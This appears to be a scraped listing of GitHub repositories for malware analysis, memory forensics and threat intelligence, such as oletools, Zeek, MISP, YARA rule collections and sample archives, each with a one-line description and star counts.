MemlabsEducational, CTF-styled labs for individuals interested in Memory Forensics
Stars: ✭ 696 (+494.87%)
MacholibreMach-O & Universal Binary Parser
Stars: ✭ 102 (-12.82%)
CortexCortex: a Powerful Observable Analysis and Active Response Engine
Stars: ✭ 676 (+477.78%)
Makinmakin - reveal anti-debugging and anti-VM tricks [This project is not maintained anymore]
Stars: ✭ 645 (+451.28%)
Pe SieveScans a given process. Recognizes and dumps a variety of potentially malicious implants (replaced/injected PEs, shellcodes, hooks, in-memory patches).
Stars: ✭ 1,783 (+1423.93%)
HabomalhunterHaboMalHunter is a sub-project of Habo Malware Analysis System (https://habo.qq.com), which can be used for automated malware analysis and security assessment on the Linux system.
Stars: ✭ 627 (+435.9%)
AutotimelinerAutomagically extract forensic timeline from volatile memory dump
Stars: ✭ 54 (-53.85%)
SpeakeasyWindows kernel and user mode emulation.
Stars: ✭ 605 (+417.09%)
FileintelA modular Python application to pull intelligence about malicious files
Stars: ✭ 97 (-17.09%)
Malware SamplesA collection of malware samples and relevant dissection information, most probably referenced from http://blog.inquest.net
Stars: ✭ 565 (+382.91%)
VirustotalA simple command-line script to interact with the virustotal-api
Stars: ✭ 50 (-57.26%)
AntivmdetectionScript to create templates to use with VirtualBox to make vm detection harder
Stars: ✭ 527 (+350.43%)
Oletoolsoletools - python tools to analyze MS OLE2 files (Structured Storage, Compound File Binary Format) and MS Office documents, for malware analysis, forensics and debugging.
Stars: ✭ 1,848 (+1479.49%)
ScriptingPS / Bash / Python / Other scripts For FUN!
Stars: ✭ 47 (-59.83%)
StringsifterA machine learning tool that ranks strings based on their relevance for malware analysis.
Stars: ✭ 469 (+300.85%)
ThreathuntThreatHunt is a PowerShell repository that allows you to train your threat hunting skills.
Stars: ✭ 92 (-21.37%)
TurbiniaAutomation and Scaling of Digital Forensics Tools
Stars: ✭ 461 (+294.02%)
PecliCLI tool to analyze PE files
Stars: ✭ 46 (-60.68%)
ThreatingestorExtract and aggregate threat intelligence.
Stars: ✭ 439 (+275.21%)
Information Security TasksThis repository is created only for infosec professionals whom work day to day basis to equip ourself with uptodate skillset, We can daily contribute daily one hour for day to day tasks and work on problem statements daily, Please contribute by providing problem statements and solutions
Stars: ✭ 108 (-7.69%)
PevThe PE file analysis toolkit
Stars: ✭ 422 (+260.68%)
RigekAnalyzing Rig Exploit Kit
Stars: ✭ 45 (-61.54%)
Malware analysisVarious snippets created during malware analysis
Stars: ✭ 413 (+252.99%)
FclFCL (Fileless Command Lines) - Known command lines of fileless malicious executions
Stars: ✭ 409 (+249.57%)
ApkidAndroid Application Identifier for Packers, Protectors, Obfuscators and Oddities - PEiD for Android
Stars: ✭ 999 (+753.85%)
SojoboA binary analysis framework
Stars: ✭ 116 (-0.85%)
Python IocextractDefanged Indicator of Compromise (IOC) Extractor.
Stars: ✭ 300 (+156.41%)
ZeekZeek is a powerful network analysis framework that is much different from the typical IDS you may know.
Stars: ✭ 4,180 (+3472.65%)
NorimaciNorimaci is a simple and lightweight malware analysis sandbox for macOS
Stars: ✭ 37 (-68.38%)
LookylooLookyloo is a web interface that allows users to capture a website page and then display a tree of domains that call each other.
Stars: ✭ 381 (+225.64%)
SimplifyAndroid virtual machine and deobfuscator
Stars: ✭ 3,865 (+3203.42%)
Virustotal ToolsSubmits multiple domains to VirusTotal API
Stars: ✭ 29 (-75.21%)
Swap digger swap_digger is a tool used to automate Linux swap analysis during post-exploitation or forensics. It automates swap extraction and searches for Linux user credentials, web forms credentials, web forms emails, http basic authentication, Wifi SSID and keys, etc.
Stars: ✭ 354 (+202.56%)
Gda Android Reversing ToolGDA is a new fast and powerful decompiler in C++(working without Java VM) for the APK, DEX, ODEX, OAT, JAR, AAR, and CLASS file. which supports malicious behavior detection, privacy leaking detection, vulnerability detection, path solving, packer identification, variable tracking, deobfuscation, python&java scripts, device memory extraction, dat…
Stars: ✭ 2,332 (+1893.16%)
ThehivedocsDocumentation of TheHive
Stars: ✭ 353 (+201.71%)
BesafeBeSafe is robust threat analyzer which help to protect your desktop environment and know what's happening around you
Stars: ✭ 21 (-82.05%)
Malware JailSandbox for semi-automatic Javascript malware analysis, deobfuscation and payload extraction. Written for Node.js
Stars: ✭ 349 (+198.29%)
Signature BaseSignature base for my scanner tools
Stars: ✭ 1,212 (+935.9%)
GonnacryA Linux Ransomware
Stars: ✭ 341 (+191.45%)
ThezooA repository of LIVE malwares for your own joy and pleasure. theZoo is a project created to make the possibility of malware analysis open and available to the public.
Stars: ✭ 7,849 (+6608.55%)
Mac aptmacOS Artifact Parsing Tool
Stars: ✭ 329 (+181.2%)
LolbasLiving Off The Land Binaries And Scripts - (LOLBins and LOLScripts)
Stars: ✭ 1,506 (+1187.18%)
IdenlibidenLib - Library Function Identification [This project is not maintained anymore]
Stars: ✭ 322 (+175.21%)
EmofishesEmofishes is a collection of proof of concepts that help improve, bypass or detect virtualized execution environments (focusing on the ones setup for malware analysis).
Stars: ✭ 11 (-90.6%)
MalheurA Tool for Automatic Analysis of Malware Behavior
Stars: ✭ 313 (+167.52%)
Flare Fakenet Ng[Suspended] FakeNet-NG - Next Generation Dynamic Network Analysis Tool
Stars: ✭ 1,214 (+937.61%)
MalsubA Python RESTful API framework for online malware analysis and threat intelligence services.
Stars: ✭ 308 (+163.25%)
Cortex4pyPython API Client for Cortex
Stars: ✭ 22 (-81.2%)
MispMISP (core software) - Open Source Threat Intelligence and Sharing Platform
Stars: ✭ 3,485 (+2878.63%)
Awesome YaraA curated list of awesome YARA rules, tools, and people.
Stars: ✭ 1,394 (+1091.45%)
Malware FeedBringing you the best of the worst files on the Internet.
Stars: ✭ 69 (-41.03%)
SeeSandboxed Execution Environment
Stars: ✭ 770 (+558.12%)
HiddenWindows driver with usermode interface which can hide objects of file-system and registry, protect processes and etc
Stars: ✭ 768 (+556.41%)
YargenyarGen is a generator for YARA rules
Stars: ✭ 795 (+579.49%)
CacadorIndicator Extractor
Stars: ✭ 115 (-1.71%)